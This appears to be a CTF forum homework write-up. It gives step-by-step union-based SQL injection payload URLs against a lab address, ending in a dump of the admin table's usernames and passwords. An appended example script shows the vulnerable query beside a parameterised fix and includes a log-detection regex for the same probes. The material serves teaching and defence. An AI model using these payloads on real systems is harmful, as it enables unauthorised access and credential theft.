化白 homework submission: Open Course, Chapter 1

silence丶   ·   Posted on 2018-12-07 15:21:50   ·   CTF&WP board

Target address: http://117.41.229.122:8003/?id=1

1. Single quote: http://117.41.229.122:8003/?id=1'  The database errors;

2. and 1=1: http://117.41.229.122:8003/?id=1 and 1=1, the SQL statement is select * from *** where id =1 and 1=1, and the page displays normally;

3. and 1=2: http://117.41.229.122:8003/?id=1 and 1=2, the SQL statement is select * from *** where id =1 and 1=2; because 1=2 is always false, the database errors, which proves that SQL injection exists.

4. order by: http://117.41.229.122:8003/?id=1 order by 10, the SQL statement is select * from *** where id =1 order by 10; because the table does not have 10 columns it errors. Testing by bisection, the column count is determined to be 2.

5. union select: http://117.41.229.122:8003/?id=1 union select 1,2  The page displays normally, so error-based injection is needed.

6. and 1=2 union select: http://117.41.229.122:8003/?id=1 and 1=2 union select 1,2  The page displays the second column.

7. @@version, database(): http://117.41.229.122:8003/?id=1 and 1=2 union select 1,@@version  The database is determined to be MySQL and the current database is maoshe.

8. Determine the table name: http://117.41.229.122:8003/?id=1 and 1=2 union select 1,table_name from information_schema.tables where table_schema=database(), the result shows the current table is admin.

9. Determine the column names: http://117.41.229.122:8003/?id=1 and 1=2 union select 1,group_concat(column_name,'-') from information_schema.columns where table_name='admin' , the column names are id, username, password.

10. Fetch the table: http://117.41.229.122:8003/?id=1 and 1=2 union select 1,group_concat(username,'-',password) from admin limit 0,1, which yields the flag.
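Added example (editor's note, not part of the write-up above and not the lab's own code): the ten steps all work because the `?id=` value is pasted into the SQL text, so the page's response (database error, normal page, empty page) leaks the shape of the query. The script below rebuilds that behaviour on an in-memory SQLite database with a constructed two-column `posts` table and an `admin` table shaped like the one in the write-up (the flag value is a placeholder), puts the concatenating lookup beside a hardened one that validates the type and binds a parameter, and finishes with a small log check that flags requests carrying the markers seen in steps 1 to 10. Names (`make_db`, `lookup_vulnerable`, `lookup_safe`, `page_behaviour`, `flagged_queries`), the sample log lines and the assumption that the endpoint only ever takes an integer id are all mine.

```python
import re
import sqlite3
from urllib.parse import parse_qs, unquote_plus, urlparse

# --- Part 1: the concatenation bug behind the lab, next to a hardened version ---
# Constructed data: a two-column query (matching "order by 2" in the write-up)
# and an admin table with id/username/password. The flag is a placeholder.

def make_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE posts (id INTEGER PRIMARY KEY, title TEXT)")
    conn.execute("INSERT INTO posts VALUES (1, 'hello world')")
    conn.execute("CREATE TABLE admin (id INTEGER PRIMARY KEY, username TEXT, password TEXT)")
    conn.execute("INSERT INTO admin VALUES (1, 'admin', 'FLAG{placeholder}')")
    conn.commit()
    return conn

def lookup_vulnerable(conn, id_param):
    """String concatenation: the ?id= value becomes part of the statement text,
    which is what lets a quote, `order by`, `and 1=2` or `union select` in."""
    sql = "SELECT id, title FROM posts WHERE id = " + id_param
    return conn.execute(sql).fetchone()

def lookup_safe(conn, id_param):
    """Validate the type first, then bind it as a parameter. The value can no
    longer change the statement's structure, so injected clauses never execute."""
    try:
        post_id = int(id_param)
    except ValueError:
        return None
    return conn.execute("SELECT id, title FROM posts WHERE id = ?", (post_id,)).fetchone()

def page_behaviour(conn, lookup, id_param):
    """Map one lookup to the three signals the write-up reads off the page:
    a database error, a normal page (a row came back) or an empty page."""
    try:
        row = lookup(conn, id_param)
    except sqlite3.Error:
        return "error"
    return "normal" if row is not None else "empty"

# --- Part 2: spotting the same probes in an access log ------------------------

# Markers taken from the probes in steps 1-10 (order by N, and 1=N, union select,
# information_schema, @@version). Case-insensitive because SQL keywords are.
INJECTION_MARKERS = re.compile(
    r"union\s+select|order\s+by\s+\d+|information_schema|@@version|\band\s+1\s*=\s*\d+",
    re.IGNORECASE,
)

# Constructed Combined-Log-Format lines replaying the write-up's first probes.
SAMPLE_LOG = [
    '10.0.0.5 - - [07/Dec/2018:15:21:50 +0800] "GET /?id=1 HTTP/1.1" 200 512',
    '10.0.0.5 - - [07/Dec/2018:15:21:52 +0800] "GET /?id=1%27 HTTP/1.1" 500 0',
    '10.0.0.5 - - [07/Dec/2018:15:21:55 +0800] "GET /?id=1+order+by+10 HTTP/1.1" 500 0',
    '10.0.0.5 - - [07/Dec/2018:15:22:01 +0800] "GET /?id=1+and+1%3D2+union+select+1%2C2 HTTP/1.1" 200 410',
]

def flagged_queries(log_lines):
    """Return the decoded query strings of requests whose ?id= is not a plain
    integer (assumption: this endpoint only takes integer ids, as the lab does)
    or whose query contains one of the markers above."""
    flagged = []
    for line in log_lines:
        m = re.search(r'"GET (\S+) HTTP/', line)
        if not m:
            continue
        query = urlparse(m.group(1)).query
        decoded = unquote_plus(query)            # "id=1+and+1%3D2..." -> "id=1 and 1=2..."
        id_values = parse_qs(query).get("id", [])
        non_integer_id = any(not v.strip().isdigit() for v in id_values)
        if non_integer_id or INJECTION_MARKERS.search(decoded):
            flagged.append(decoded)
    return flagged

if __name__ == "__main__":
    db = make_db()
    for probe in ["1", "1'", "1 and 1=2", "1 order by 10", "1 and 1=2 union select 1,2"]:
        print(f"{probe!r:40} vulnerable={page_behaviour(db, lookup_vulnerable, probe):7} "
              f"safe={page_behaviour(db, lookup_safe, probe)}")
    print("flagged:", flagged_queries(SAMPLE_LOG))
```

Run it and the vulnerable lookup reproduces the write-up's signals in order (error, empty, error, then a row whose second column is the injected `2`), while the hardened lookup answers every probe except the plain `1` with an empty page, which is what removes the oracle the bisection in step 4 depends on. The log check is deliberately narrow: for an integer-only endpoint, any non-numeric `id` is already worth an alert, and the keyword markers catch the probes even when they arrive URL-encoded.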

